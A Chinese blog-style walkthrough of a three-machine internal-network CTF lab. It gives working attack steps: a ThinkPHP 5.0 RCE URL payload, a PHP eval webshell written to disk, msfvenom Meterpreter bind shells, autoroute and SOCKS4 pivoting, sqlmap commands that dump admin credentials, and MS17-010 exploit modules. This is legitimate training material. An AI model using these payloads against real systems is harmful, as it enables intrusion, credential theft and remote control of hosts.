CFS三层内网靶场

前言

最近学习了内网的一些知识，想着打一下靶场来试试，选择了这个CFS的三层内网靶场，做一下记录

• 靶场下载地址

  链接：https://pan.baidu.com/s/1zGw5VNt222nCmfouVWLupQ
    提取码：6u5e

具体的环境配置以及靶机IP如下图所示：

1.对target1进行渗透

首先我们使用nmap对target1进行端口扫描，看看能不能找到什么开放的端口

可以看到，开放了80端口，以及8888端口，80端口是http网站得默认端口，8888端口对应的是宝塔的管理面板，那我们就访问80端口看看是什么页面

是一个thinkPhP5.0的框架，参考了网上文章，v5.0版本存在RCE漏洞：https://blog.csdn.net/qq_45557476/article/details/125275641

那么我们就来构建poc，看看是不是能执行whoami的命令　　poc：http://192.168.75.129/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

可以看到成功的返回信息，那么现在我们就可以网其中写入php一句话代码，因为这是一个靶场所以不需要对小马做免杀，直接echo写入即可

尝试写入phpinfo()

http://192.168.75.129/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20phpinfo();?%3E%22%20%3E%20info.php

成功了！写入小马http://192.168.75.129/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27%3C?php%20eval($_REQUEST[123]);?%3E%27%20%3Eb.php,访问b.php发现文件存在，然后使用蚁剑连接。拿到第一个flag。

2.对target2进行渗透

现在拿到了target1主机的权限，那么现在把target1主机连接到到msf上

1)生成后门文件

2）接受反弹

在target1上运行后门文件，可以使用chmod +x对文件进行简单的提权，使其可以运行，然后在kali上使用msf接受会话

可以发现，这台主机有两张网卡，一个是22网段一个是75网段，那么我们现在需要攻击的主机就在22网段下

但是，我们实际上是没有对22网段机器的访问权限的，我们只能通过target1作为中介，去和22网段的机器进行交互，那么这个时候我们就需要使用msf首先给target1设置路由

这时候所有kali发往22网段的请求在经过target1的时候会被转发，那么target1就好像是我们的一个代理服务器一般，但是就算在target1上添加上了这个路由，我们仍然需要在kali上进行代理设置才可以实现效果。这时候就可以用到sock4+proxychains4代理打通内网

开通sock4代理

修改proxychains4配置文件

节省时间只对目标机器做了扫描

可以看到80端口开放，那么浏览器设置sock4代理去访问。

访问成功，可以看到是一个八哥CMS

访问http://192.168.22.129/robots.txt发现暴露了后台地址，成功进入后台地址，那么怎么拿到账号密码吗，在首页的html中给了我们sql注入的地址

前台html代码给的sql注入点

sqlmap一把梭

sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.128:2222 --dbs

sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.128:2222 -D bagecms --tables 

sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.128:2222 -D begacms -T bage_admin --columns

sqlmap -u "http://192.168.22.129/index.php?r=vul&keyword=1" --proxy=socks4://192.168.75.128:2222 -D begacms -T bage_admin -C username,password --dump

拿到用户名密码admin 123qwe，可以看到flag

3.对target3进行渗透

在内容模板写入shell

蚁剑设置代理192.168.75.128 2222，访问target2主机，发现33网段

因为是使用代理访问的22网段的shell 访问不到33网段 所以使用msf生成一个正向马

msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=4444 -f elf -o test.elf

将马赋执行权限上传到webshell中 同时使用代理开启一个msf

proxychains4 msfconsole

使用代理的msf开启监听

use exploit/multi/handler 使用监听模块
set payload linux/x86/meterpreter/bind_tcp 设置payload
set lport 4444 设置接收端口与msfvenoms生成端口一致
set rhost 192.168.22.129 设置目标主机(target2)

在target2上添加添加33网段路由

run autoroute -s 192.168.33.0/24

run autoroute -p

使用msf扫描模块扫描端口

use auxiliary/scanner/portscan/tcp

发现 192.168.33.33 主机并开放 445、3389  敏感端口

msf尝试永恒之蓝

use auxiliary/scanner/smb/smb_ms17_010 检测ms17010是否存在

use exploit/windows/smb/ms17_010_psexe 利用ms17010

use auxiliary/admin/smb/ms17_010_command 这个exp可以执行命令

至此三台靶机shell拿下了